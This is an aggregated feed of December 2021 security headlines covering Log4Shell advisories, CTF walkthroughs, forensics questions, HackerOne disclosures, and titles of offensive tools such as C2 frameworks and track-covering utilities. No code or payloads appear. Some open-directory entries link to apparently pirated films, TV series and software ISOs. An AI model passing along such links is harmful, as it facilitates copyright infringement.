    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0  ( 2 min )
  • Open

    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh [link] [comments]  ( 2 min )
    Hook Heaps and Live Free
    submitted by /u/jat0369 [link] [comments]
    Common security issues when configuring HTTPs connections in Android
    submitted by /u/Masrepus [link] [comments]  ( 2 min )
    Android application testing using windows 11 and windows subsystem for android
    submitted by /u/0xdea [link] [comments]
    RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit
    submitted by /u/parsiya2 [link] [comments]  ( 4 min )
  • Open

    Log4j Vulnerability Explanation In Details
    Everything you need to know about log4j vulnerability as a hacker !  ( 4 min )
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu’alaikum (Peace be upon you)  ( 4 min )
    Inclusion TryHackme
    Hi, amazing hackers I today came another interesting topic which is local file inclusion. Local File Inclusion is part of OWASP's top 10…  ( 2 min )
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 13 min )
  • Open

    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29639132 Points: 1 # Comments: 0  ( 6 min )
    What is the Log4j vulnerability and should I do anything to protect myself?
    Article URL: https://www.washingtonpost.com/technology/2021/12/20/log4j-hack-vulnerability-java/ Comments URL: https://news.ycombinator.com/item?id=29638820 Points: 2 # Comments: 0  ( 1 min )
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0  ( 2 min )
    Log4j vulnerability: what should boards be asking?
    Article URL: https://www.ncsc.gov.uk/blog-post/log4j-vulnerability-what-should-boards-be-asking Comments URL: https://news.ycombinator.com/item?id=29635047 Points: 1 # Comments: 0
    Is log4js-node affected by the log4s vulnerability? (no)
    Article URL: https://github.com/log4js-node/log4js-node/issues/1105 Comments URL: https://news.ycombinator.com/item?id=29632280 Points: 1 # Comments: 1  ( 3 min )
  • Open

    SecWiki News 2021-12-21 Review
    Reflections on foreign cyber exercises by ourren; CaptfEncoder: a cross-platform network security tool suite by guyoung; For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Log4j: A forcing function to adopt long-overdue continuous security
    Are you prepared for the next big zero day exploit? Read what we learned from the Log4j crisis and what you can do to secure your assets with continuous AppSec. READ MORE  ( 4 min )
    Trends that underscore the seriousness of the cybersecurity skills gap
    It is no secret that there’s a glaring skills gap in cybersecurity. Learn more about the trends impacting AppSec success and the steps that can help bridge gaps in DevSecOps workflows. READ MORE  ( 6 min )
  • Open

    MCFE certification
    So I took the MCFE about 4 days ago, passed, and I haven't heard back from magnet about my certification. Should I contact someone or just wait a while longer? submitted by /u/bath_and_toaster [link] [comments]  ( 1 min )
    Need help on the state of and keywords for mobile device tracking in 1999
    Everybody look at their shelves and find books/software from 1999. Thank you for any pointers to books or sources. Not an attorney, just helping a friend doing life. Working up an appeal and several FOIA requests and searching for exact phrasing to use. What software/hardware/process existed in 1999 for any level of law enforcement to trace cell tower movements? Feds to state levels. Suspecting it was all tower techs as time permitted. Was any GPS data on a 2G flip worth looking at back in 1999? Looking for more than cell tower data in there maybe? Any specific references to law enforcement access to request tower pings, especially near Kentucky, 1999. (1999) My friend asked his attorneys to get the cell tower data and the lawyer contacted a tech that gave them a highly technical handwritten reply. This note was lost. Police did not produce cell data to place him at scene in a nearby state, KY. Suspect it was suppressed and it needs to be found as a purchase for software/training or Federal cooperation of some department that I am guessing at, like the FCC, FBI or the actual phone company. Thanks again! I am old school, OpenVMS VAX/Alphas ~Peace submitted by /u/OK_AquaFarmer [link] [comments]  ( 3 min )
  • Open

    CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter Fork with some improvements
    submitted by /u/v1brio [link] [comments]
    Powershell .Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploiter
    submitted by /u/v1brio [link] [comments]
  • Open

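    Logistics giant data breach, phishing attacks impersonating Pfizer | Global cybersecurity highlights for December 21
    The city government of Tulsa, USA, spent US$2 million and 8 months recovering from a ransomware attack.  ( 1 min )
    PyMICROPSIA: the new information-stealing trojan from Two-tailed Scorpion strikes again
    Recently, the RedDrip Team of the QiAnXin Threat Intelligence Center captured attack samples built in Python by this group during routine threat hunting; samples of this kind were first discovered by a foreign vendor and named PyMICROPSIA.  ( 1 min )
    Cloud native: Kubernetes security
    As more and more enterprises move to the cloud, cloud-related scenarios come up often in attack-defense exercises, for example public cloud, private cloud, hybrid cloud and virtualized clusters.  ( 3 min )
    How DDoS and CC attacks work (part 2)
    This article describes the protection mechanisms against DDoS and CC attacks.  ( 1 min )
    T-Mobile has blocked 21 billion scam calls this year, more than half related to vehicle warranty scams
    On average it identifies and blocks 1.8 billion attempted scam calls per month, that is, 700 attempted scam calls per second!  ( 1 min )
    You can execute commands like this? A study of command execution bypasses and protection rules
    A study of command execution bypasses and protection rules  ( 1 min )
    Hackers use the Log4Shell vulnerability to attack the Belgian Ministry of Defence
    The Belgian Ministry of Defence suffered a cyberattack.
    Clop ransomware gang is leaking confidential UK police data
    The Clop ransomware gang successfully stole confidential data belonging to UK police and leaked it on the dark web.
    A study of detection and protection strategies for the Log4j2 remote code execution vulnerability
    It has been some time since the Log4j2 vulnerability came to light, and the major security vendors have offered their own solutions for fixing it.
    Zero Hour Technology | Analysis of the attack on DeFi platform Grim Finance
    On December 19, 2021 (Beijing time), Grim Finance officially tweeted that the platform had been exploited by an external attacker, who stole coins worth more than US$30 million.  ( 1 min )
    Seeking out the emerging forces in China's cybersecurity industry | Preparations begin for the first "New Forces in Cybersecurity" conference
    With the "CIS 2021 Cybersecurity Innovation Conference, Spring Edition" being held, preparations for the first "New Forces in Cybersecurity" event have officially begun.
    Meta files lawsuits over phishing attacks
    Meta is filing a series of lawsuits against phishing attackers and people who abuse the platform for malicious purposes.  ( 1 min )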
  • Open

    admin password disclosure via log file
    Acronis disclosed a bug submitted by darkdream: https://hackerone.com/reports/1121972 - Bounty: $100
    Log4j RCE on https://judge.me/reviews
    Judge.me disclosed a bug submitted by bhishma14: https://hackerone.com/reports/1427589 - Bounty: $50
  • Open

    USA Movies
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
  • Open

    Custom Metasploit Module for Log4Shell Scanner
    In this article, we will discuss a customized Metasploit module I wrote for scanning applications vulnerable to Log4Shell as well as how… Continue reading on Medium »  ( 3 min )

  • Open

    Is it possible to encrypt my browsing data in a public wi-fi without using a VPN?
    I've been thinking a lot about this since recently a coffee shop near me opened, and it had open wifi. I do not want to pay for a VPN since I do not trust them for my data to show up as encrypted into the network. I found this on GitHub, but I have not tested it enough to see if it works. So can someone give any help with that? submitted by /u/ArturEPinheiro777 [link] [comments]  ( 2 min )
    Best Practices with Email DLP Exceptions
    Hey Guys, So we have our entire org covered with email DLP from O365, one of our vendors generally deals with sensitive data (social security numbers) and thus have requested to have an exception for them, what should be the best way to deal with it. Bypassing the entire DLP policy for an email ID although sounds easy but wanted to hear back some feedback on the best practices submitted by /u/w33ha_AD [link] [comments]  ( 1 min )
    I've read about multiple data breaches at US cell phone carriers (ex: AT&T, T-Mobile). Where is this data going? Is there a way I can see if my information is floating around and how widely it is distributed?
    Basically, these hacks are pretty significant and I'd like to know both the depth and breadth of what people know about my personal information. Inb4: It's all out there, I suppose it is, but I want to know the specifics, if only out of curiosity. Like, if one alpha hacker knows and doesn't share it with anybody, I'm probably good because I'm neither rich nor famous enough to really draw his or her attention. If it's out in the open for all to see, on the other hand, somebody might harass me. I use a Yubikey so I'm good there. Thank you! submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Owning Internal networks is way too easy, what could Microsoft do to improve the situation?
    It's more surprising when you don't get domain admin. So many things are broken, the terrible implementation of name resolution, machines caching login credentials, passing the hash, golden tickets, NTLM relay, IPv6, WPAD, the list goes on. Surely there must be a better way. What are some improvements you would like to see from Microsoft? submitted by /u/ImTheMaddest [link] [comments]  ( 6 min )
  • Open

    Intruding 5G SA core networks from outside and inside
    submitted by /u/sebazzen [link] [comments]
    OSS Getting Hammered for BigCorp Failures
    submitted by /u/GelosSnake [link] [comments]  ( 1 min )
    Inside a PBX - Discovering a Firmware Backdoor
    submitted by /u/RedTeamPentesting [link] [comments]  ( 1 min )
    letme.go - A minimalistic Meterpreter stager written in Go
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046)
    submitted by /u/ScottContini [link] [comments]  ( 1 min )
  • Open

    A Simple Geolocation Exercise
    In September 2020, British army paratroopers performed a joint training exercise with Ukrainian armed forces as part of Exercise Joint… Continue reading on Medium »  ( 3 min )
    How Not to Get “Caught” — An OPSEC (Operational Security) Advice Aware Analysis of a Modern…
    Have you ever dreamed of getting “caught” and actually making the headlines with your latest research that also includes the digitally… Continue reading on Medium »  ( 4 min )
    Setting them Straight — 10 Years Back in the Future — A Brief Overview of the Hacker Scene Circa…
    Do you remember the hacker scene circa the 90s? Check out this brief analysis of the Scene up to present day back then. Keep reading. Continue reading on Medium »  ( 5 min )
  • Open

    An adorable twenty-seven second stop-motion video titled, "themonster.mov"
    submitted by /u/HGMIV926 [link] [comments]  ( 2 min )
    pictures of britain
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Betty's recipes.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Sharing my movie theme music collection
    submitted by /u/ercohn [link] [comments]  ( 1 min )
    X Files complete series 1080p (English and Spanish subs)
    submitted by /u/Skajuan [link] [comments]  ( 1 min )
  • Open

    Inverting PhotoDNA with Machine Learning
    submitted by /u/anishathalye [link] [comments]  ( 1 min )
    X-Ways handling of ad1 images
    Does X-Ways have an issue with ad images? I currently have at least 200 ad1 images from a 750gb disk unallocated space. I need to do data carving on the totality of the images. When doing “refine volume snapshot” one image at a time, I sometimes have files that do not really represent what I am searching for. For example, on one image I could carve 18 files, all mp3 files. These are not the files I am looking for. I am searching for doc/docx files that I know are there (we did live forensic before acquiring the hdd). What are your thoughts on this? submitted by /u/MisterTroubadour [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-20 Review
    SecWiki Weekly (issue 407) by ourren; Introduction to CIS (part 2): CIS Benchmark & CIS Community Defense Model 2.0 by ourren; For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Shellcode Generation with The Radare2 Framework
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    Log4j Vulnerability – What You Need to Know and How to Address Immediately
    Article URL: https://www.crestdatasys.com/blogs/log4j-vulnerability-what-you-need-to-know-and-how-to-address-immediately/ Comments URL: https://news.ycombinator.com/item?id=29622121 Points: 3 # Comments: 0  ( 4 min )
    Apache Log4j 2 vulnerability – Detection and fix simplified in your Java code
    Article URL: https://medium.com/@amitsoni4774/apache-log4j-2-vulnerability-detection-and-fix-simplified-in-your-java-code-9a6dd1d06796 Comments URL: https://news.ycombinator.com/item?id=29620987 Points: 2 # Comments: 0  ( 2 min )
  • Open

    Fuzzing
    Article URL: https://owasp.org/www-community/Fuzzing Comments URL: https://news.ycombinator.com/item?id=29620816 Points: 2 # Comments: 0  ( 4 min )

  • Open

    Moving my server sooo grab what you want. Super fast speeds TV/Music/Movies
    submitted by /u/Bryan2pointOh [link] [comments]  ( 1 min )
    What's your F***ing problem ?
    Hi everyone. I would like to talk about a subject that I consider abnormal. First of all I would like to clarify that: - I would like to apologize for this off topic - This post does not concern the 99% of OpenDirectories users, whom I also thank to keep this subreddit alive and for their work. - I would like to thank the moderation team, who do an excellent job. - I don't give a damn about karma points, my account can drop to -10,000, I don't care, it's just an "aesthetic feature". There are times when some users post sites that they haven't thoroughly reviewed, and that's okay. In these publications, it happens that some content is illegal, immoral or whatever ... It is not the fault of the users who provided the link, it is something that happens. But why, for cryi…  ( 4 min )
  • Open

    log4j — Getting to 2.16 and 2.17 is Only Critical If You Have Non-Default Logging Enabled
    submitted by /u/danielrm26 [link] [comments]  ( 2 min )
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    All in One SEO Plugin Vulnerability Affects 3M Sites
    Article URL: https://www.searchenginejournal.com/all-in-one-seo-vulnerability-2021/430230/ Comments URL: https://news.ycombinator.com/item?id=29615935 Points: 1 # Comments: 0  ( 4 min )
    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29611871 Points: 2 # Comments: 0  ( 6 min )
    Deep Understanding of Commits for Automated Vulnerability Identification
    Article URL: https://sites.google.com/view/du-commits/ Comments URL: https://news.ycombinator.com/item?id=29611738 Points: 1 # Comments: 0  ( 1 min )
    Xcode 13.2 contains Log4j vulnerability
    Article URL: https://developer.apple.com/forums/thread/696785 Comments URL: https://news.ycombinator.com/item?id=29610913 Points: 181 # Comments: 41  ( 4 min )
  • Open

    GDB/Pedas Help
    I've set up GDB and Peda, and peda works fine except some commands require sudo. However, whenever I run GDB with sudo, it loads plain GDB without peda. I've edited the .gdbinit file as the instructions say. Any help would be appreciated. submitted by /u/Radiant-Midnight-278 [link] [comments]
  • Open

    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh [link] [comments]  ( 1 min )
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan [link] [comments]  ( 1 min )
  • Open

    The Insidious Need for Speed
    “We need it yesterday. Speed kills. Coffee is for closers. First to market. If you’re in control, you’re not going fast enough.” Continue reading on Medium »  ( 4 min )
    OSINT CASE STUDY 1
    disclaimer: education purpose only Continue reading on Medium »  ( 2 min )
    Uncovering the hackers, who stole your Facebook account
    About 6-months ago I was sitting at my desk, working on my CS145 homework, when I heard a familiar ding, a new message on Facebook… Continue reading on Medium »  ( 4 min )
  • Open

    SecWiki News 2021-12-19 Review
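    In-depth analysis of SPEL expression injection vulnerabilities by ourren; Detecting CobaltStrike based on anomalous behavior by ourren; Exploring an HTTP asset identification method based on rule vectorization by ourren; A brief look at passive IAST products and their technical implementation: code implementation demo by ourren; A brief look at passive IAST products and their technical implementation: fundamentals by ourren; Finding bugs with Codeql? by ourren; Incident response: how to trace an attack when there are no traces by ourren; Several niche but practical remote-control tools by ourren; Details of the iMessage zero-click exploit made public by ourren; ACSAC 2021 list of accepted papers by ourren; For more of the latest articles, visit SecWiki  ( 2 min )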
  • Open

    digital world.local: Vengeance Vulnhub Walkthrough
    Donavan’s VENGEANCE (digitalworld.local: VENGEANCE) is a medium level machine designed for Vulnhub. This lab includes a difficult exploitation procedure that is suitable for those experienced The post digital world.local: Vengeance Vulnhub Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Unauthorized access to choice.av.ru control panel
    Azbuka Vkusa disclosed a bug submitted by wocat: https://hackerone.com/reports/963161 - Bounty: $100
    Open redirect (DOM-based) on av.ru via "return_url" parameter (Login form)
    Azbuka Vkusa disclosed a bug submitted by zophi: https://hackerone.com/reports/958864 - Bounty: $100
    Dependency repository hijacking aka Repo Jacking from GitHub repo rubygems/bundler-site & rubygems/bundler.github.io + bundler.io docs
    RubyGems disclosed a bug submitted by akincibor: https://hackerone.com/reports/1430405

  • Open

    Log4j 2.17.0 released, for third CVE (CVE-2021-45105)
    Article URL: https://logging.apache.org/log4j/2.x/index.html Comments URL: https://news.ycombinator.com/item?id=29609578 Points: 3 # Comments: 2  ( 5 min )
    Third High Severity CVE in Log4j Is Published
    Article URL: https://logging.apache.org/log4j/2.x/security.html Comments URL: https://news.ycombinator.com/item?id=29604097 Points: 430 # Comments: 306  ( 11 min )
  • Open

    Patch fixing critical Log4j 0-day has its own vulnerability that’s under exploit
    Article URL: https://arstechnica.com/information-technology/2021/12/patch-fixing-critical-log4j-0-day-has-its-own-vulnerability-thats-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=29609295 Points: 2 # Comments: 0  ( 3 min )
    Apache Log4j Vulnerability Webinar – What You Need to Know
    Article URL: https://www.criticalinsight.com/resources/news/article/apache-log4j-vulnerability-webinar-what-you-need-to-know/ Comments URL: https://news.ycombinator.com/item?id=29608959 Points: 1 # Comments: 0  ( 2 min )
  • Open

    How.It.Made
    submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    A few directories with small amount of music
    Index of /stuff/mp3/amd (audio.msk.ru) Index of /music/funk (czyborra.com) Index of /files (rarekindrecords.co.uk) Index of /audio/ (martindoyleflutes.com) (music from an irish flute player) Index of /files/mp3 (saparov.ru) Index of /albums/4151 (soton.ac.uk) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Want to know some line-dancing moves? Here's some PDFs that show you some dance steps.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
  • Open

    Reasons to go looking in the Registry
    Chris Sanders tweeted out an interesting pair of questions recently, and the simple fact is that for me to fully answer the question, the tweet thread would be just too extensive. The questions were: What are the most common reasons you go looking in the Windows registry? What do you use it to prove most? Like almost everything else in DFIR, my response to both questions is, it depends. Why? Well, it depends upon the goals of your investigation. What I use the Registry to prove depends heavily on what I'm trying to prove, or to disprove. This may sound pretty obvious, and even intuitive, but far too often in DFIR, we can find ourselves far too easily chasing down rabbit holes that have little, if anything, to do with our investigative goals. Configuration The Windows Registry holds a g…  ( 7 min )
  • Open

    Preferred method of collecting folders or loose documents on Macs ?
    I'm using Sumuri Recon and looking through the features but it seems to be an all or nothing product (imaging the entire disk/volume). This is not confirmed by any means. I haven't spent enough time with Sumuri but it doesn't appear to allow for collection of specific folders. Anyone here have experience with small targeted forensically sound collections on Macs? The hardware dongle makes this a small pain point as it would be nice to remotely preserve a few documents in a defensible manner. This is very simple when dealing with Windows devices where FTK imager can be installed and executed within seconds. Anyone aware of a Mac APFS equivalent? This particular remote MacBook pro is on Catalina (APFS) and I have all the keys to the castle. I'm not as interested in preserving extended Metadata as I am in the plain created and modified date. Perhaps a zipping solution that preserves these two dates? submitted by /u/zero-skill-samus [link] [comments]  ( 1 min )
    How does forensic imaging of locked cellular devices work?
    I've been looking into mobile forensics and I've realized that everything I come across pertaining to imaging a filesystem starts with "Unlock the device". This doesn't quite make sense to me, because if an LEO gets a warrant to search a phone, the owner obviously doesn't have to tell them/enter the password. And from what I can tell, the only way to really "get" the password starts off with imaging the filesystem/creating a backup. Am I missing something? submitted by /u/Fusiondew [link] [comments]  ( 4 min )
    CCTV went down
    Hello to all forensicators, We have a weird situation where about 20 of our CCTVs just stopped recording. One of our external vendors was running a VAPT test on the vlan containing the cameras at the same time they went down. The CCTV logs show us that XSS and SQL injection attacks were being run on the cameras. Checking the application log tells us the time when the cameras stopped recording and the time they got back online. However I am unable to figure out what was the exact attack that brought down the cameras. What logs should I be looking at to figure this out? submitted by /u/indianadmin [link] [comments]  ( 1 min )
    VPN data exfiltration
    A colleague of mine was referencing someone using a Kali Linux USB drive on a windows 10 machine and connecting to a VPN. They believe the individual was pushing business related data through the VPN that was unauthorized. Is there anything forensically that one could look for on what might have gone outbound on the EO1? submitted by /u/WhoAteTheLastCookie [link] [comments]  ( 2 min )
  • Open

    A Detailed Guide on Log4J Penetration Testing
    In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the The post A Detailed Guide on Log4J Penetration Testing appeared first on Hacking Articles.  ( 8 min )
  • Open

    SecWiki News 2021-12-18 Review
    Reproducing the CVE-2016-7124 deserialization vulnerability by SecIN community; For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    HackMyVM — Forbidden
    Writeup (Spanish) Continue reading on Medium »  ( 3 min )
    Should You Trust Your Admin Tools?
    No, not really Continue reading on Medium »  ( 4 min )
  • Open

    Stored XSS on 1.4.0
    ImpressCMS disclosed a bug submitted by tehwinsam: https://hackerone.com/reports/1331281
    HTML injection in email content during registration via FirstName/LastName parameter
    MTN Group disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1256496
    Flickr Account Takeover using AWS Cognito API
    Flickr disclosed a bug submitted by lauritz: https://hackerone.com/reports/1342088 - Bounty: $7550
  • Open

    Alternative Process Injection
    submitted by /u/dmchell [link] [comments]
  • Open

    lurch1317: A new pidgin plugin with strong crypto for deniability (WIP)
    submitted by /u/hardenedvault [link] [comments]  ( 1 min )
    Log4j version 2.17.0 fixes a new problem CVE-2021-45105 DoS vuln (CVSS score of 7.5)
    submitted by /u/ScottContini [link] [comments]  ( 2 min )
  • Open

    [Day 16] OSINT Ransomware Madness | Advent of Cyber 3 (2021)
    OSINT stands for Open Source Intelligence, information that can be obtained from free and public sources. Offensive teams commonly use… Continue reading on Medium »  ( 3 min )

  • Open

    Threat Intelligence on Log4j CVE: Key Findings and Their Implications
    Article URL: https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications Comments URL: https://news.ycombinator.com/item?id=29599546 Points: 1 # Comments: 0  ( 6 min )
    Security in context: When is a CVE not a CVE?
    Article URL: https://snyk.io/blog/when-is-a-cve-not-a-cve/ Comments URL: https://news.ycombinator.com/item?id=29589692 Points: 2 # Comments: 0  ( 5 min )
    Bypass of allowedLdapHost check in Log4j 2.15.0 – Log4Shell (CVE-2021-44228)
    Article URL: https://twitter.com/marcioalm/status/1471740771581652995 Comments URL: https://news.ycombinator.com/item?id=29588947 Points: 3 # Comments: 1  ( 1 min )
    Risk analysis of Log4Shell (CVE-2021-44228) and mitigation
    Article URL: https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html Comments URL: https://news.ycombinator.com/item?id=29587870 Points: 1 # Comments: 0  ( 4 min )
  • Open

    If You're Not Doing Continuous Asset Management You're Not Doing Security
    submitted by /u/danielrm26 [link] [comments]  ( 3 min )
    Fail2ban / Regexp rule against LOG4J vuln
    submitted by /u/AGS42 [link] [comments]
    Log4Shell Update: Full bypass found in log4j 2.15.0, enabling RCE again (with payload)
    submitted by /u/freeqaz [link] [comments]  ( 2 min )
  • Open

    A website's gone
    What happened to the.eye? Is it dead, dead or is there a second website? Also, the link to the discord that the automod gave me was invalid. submitted by /u/Sleepingpiranha [link] [comments]  ( 2 min )
    A large collection of indiscriminately-named mp3 music.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Sparks albums
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
  • Open

    html injection at judge.me
    Judge.me disclosed a bug submitted by 0xteles: https://hackerone.com/reports/1036995
    Reflected Cross-Site Scripting/HTML Injection
    Informatica disclosed a bug submitted by jak0_: https://hackerone.com/reports/1379158
  • Open

    SecWiki News 2021-12-17 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    CALDERA
    Hey everyone, Does anyone here use or have used CALDERA? A small question regarding initial access; Are we meant to deploy an agent locally then do lateral movement within the network to reach other target machines? Thank you! submitted by /u/lifeislemon_not_cake [link] [comments]  ( 1 min )
  • Open

    Extract sms messages from Google Backup? Cellebrite failed on Android/Samsung
    I've tried using Cellebrite Cloud to extract messages from a Google drive Android backup (Android sends Google backups to Google Drive). It failed to parse after running several tests using my own device. I also tried to access my Samsung backup which includes messages. Cellebrite Cloud failed to login at all. Has anyone had any success accessing or extracting sms from Android Google backups or Samsung backups? It's unfortunate when tools provide that service yet fail to perform. submitted by /u/zero-skill-samus [link] [comments]  ( 2 min )

  • Open

    CHFI 2021 Exam Review
    As some of you may know, CHFI is considered to be the base line of computer forensics certifications which is why I thought that buying a test and course from EC-Council would be the place to start. I will lay out the topics that I was NOT expecting to get tested on. Let me preface by saying that there is NO one study guide out there that will prepare you for your test. You will hear people saying "I didn't study and still passed/I studied for two weeks and passed." Unless, you've worked as a SOC Analyst or have 2 years of prior computer forensics, you will fail. I began studying in January of this year and took the test in October. I failed with a 57%. While you need a 75%~ to pass, there are things the EC-Council test prep package did NOT prepare me for and the only reason why I got…  ( 4 min )
    SUMURI RECON ITR now has the ability to physically image M1, M1 Max, and M1 Pro Mac computer
    submitted by /u/acw750 [link] [comments]  ( 1 min )
    Detecting RAID parameters for rebuild
    Hi all, I have 3 E01 raid discs from a QNAP device, which I am trying to rebuild. X-Ways, OS Forensics and mdadm don't recognize the raid parameters automatically. So the day has finally come to learn more about raid.... Is there somebody here who can point me to some good reading on how to extract these parameters from the discs? Thanks in advance! submitted by /u/Lizzy4235 [link] [comments]  ( 1 min )
  • Open

    Google storage bucket takeover which is used to load JS file in dashboard.html in "github.com/kubernetes/release" which can lead to XSS
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398706 - Bounty: $100
    Race Condition Vulnerability when creating profiles
    Showmax disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1428690
    Able to access private picture/video/writing when requesting for their JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1424291 - Bounty: $250
    Broken Link Takeover from kubernetes.io docs
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398572 - Bounty: $100
    Broken Github Link Used in deployment docs of "github.com/kubernetes/kompose"
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398617 - Bounty: $100
  • Open

    digital world.local: FALL Vulnhub Walkthrough
    FALL (digitalworld.local: FALL) is a medium level machine created by Donavan for Vulnhub. This lab is appropriate for some experienced CTF players who wish to The post digital world.local: FALL Vulnhub Walkthrough appeared first on Hacking Articles.  ( 5 min )
    Thales1 Vulnhub Walkthrough
    “Thales” is a Capture the Flag challenge available on Vulnhub. MachineBoy deserves credit for developing this box. In this box, we will learn how to The post Thales1 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Forgiveness
    I forgive you for your first lies. I forgive myself for believing into it. Continue reading on Medium »  ( 1 min )
  • Open

    Mitigating the Log4Shell vulnerability (CVE-2021-44228) on DietPi
    Article URL: https://dietpi.com/blog/?p=1172 Comments URL: https://news.ycombinator.com/item?id=29581625 Points: 2 # Comments: 0  ( 5 min )
    Securing K8s clusters for Log4j CVE-2021-44228
    Article URL: https://github.com/kubearmor/log4j-CVE-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29573520 Points: 1 # Comments: 0  ( 7 min )
  • Open

    Old programs for WIN & MAC (Office 95, Encarta, iLife, etc) and ISOs
    Aux francais mostly http://145.239.62.120/download_center/repos/Applications/ http://145.239.62.120/download_center/repos/ISOs/ submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-16 Review
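    Research on detection and protection strategies for the Log4j2 remote code execution vulnerability by ourren. For more of the latest articles, visit SecWiki  ( 2 min )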
  • Open

    Nighthawk 0.1 - New Beginnings - @MDSecLabs
    submitted by /u/dmchell [link] [comments]  ( 1 min )

  • Open

    Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    My road map !! Need help
    This is my roadmap to be a red teamer. Does anything need to change? 1- learn programming ---python ---C/C++ 2-Networking and OS ---Linux ---IT and Networking Basics ---THM Pre security path 3-Web Security ---THM Web fundamentals path ---OWASP TOP 10 Guide 4-Hacking Basics ---THM Complete beginner path ---INE PTS Course ---THM jr penetration tester path 5- Doing CTFs ---THM ---Hack the box ---Vulnhub 6-The OSCP 7-Red team Certs ---pentester academy CRTP ---pentester academy CRTE ---Offensive security OSCE ---NOTES--- I am a computer science student I have learned C++ and python scripting And linux command line submitted by /u/Ok_Attempt_3411 [link] [comments]  ( 2 min )
    Guys, does anyone know anything about 7asecurity.com course content?
    Guys, does anyone know anything about 7asecurity.com course content? submitted by /u/Select_Plane_1073 [link] [comments]  ( 1 min )
  • Open

    Windows Credential Manager for hackers
    Windows can store credentials for easy reuse. There are several ways to access them. Continue reading on System Weakness »  ( 3 min )
    Runas for hackers
    Please, refer to the post on Credential Manager if you are interested in seeing how to manage stored credentials in windows. This will be… Continue reading on System Weakness »  ( 4 min )
    HackMyVM — Twisted
    Writeup (Español) Continue reading on Medium »  ( 2 min )
  • Open

    Hot-patch CVE-2021-44228 by exploiting the vulnerability itself
    Article URL: https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch Comments URL: https://news.ycombinator.com/item?id=29571694 Points: 1 # Comments: 0  ( 1 min )
    Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE)
    Article URL: https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/ Comments URL: https://news.ycombinator.com/item?id=29569587 Points: 2 # Comments: 0  ( 10 min )
    Protection against CVE-2021-45046, the additional Log4j RCE vulnerability
    Article URL: https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29568125 Points: 3 # Comments: 0
    Log4j Vulnerability (CVE-2021-44228)
    Article URL: https://github.com/NCSC-NL/log4shell Comments URL: https://news.ycombinator.com/item?id=29563247 Points: 2 # Comments: 0  ( 3 min )
    Google Chrome Zero Day CVE-2021-4102, Use after free in V8
    Article URL: https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html Comments URL: https://news.ycombinator.com/item?id=29561740 Points: 82 # Comments: 27  ( 6 min )
  • Open

    Weak rate limit could lead to ATO due to weak password protection mechanisms
    Reddit disclosed a bug submitted by bombon: https://hackerone.com/reports/1065186 - Bounty: $100
    No rate limit on password reset leads to email enumeration at gateway-production.dubsmash.com
    Reddit disclosed a bug submitted by cracker922: https://hackerone.com/reports/1425884
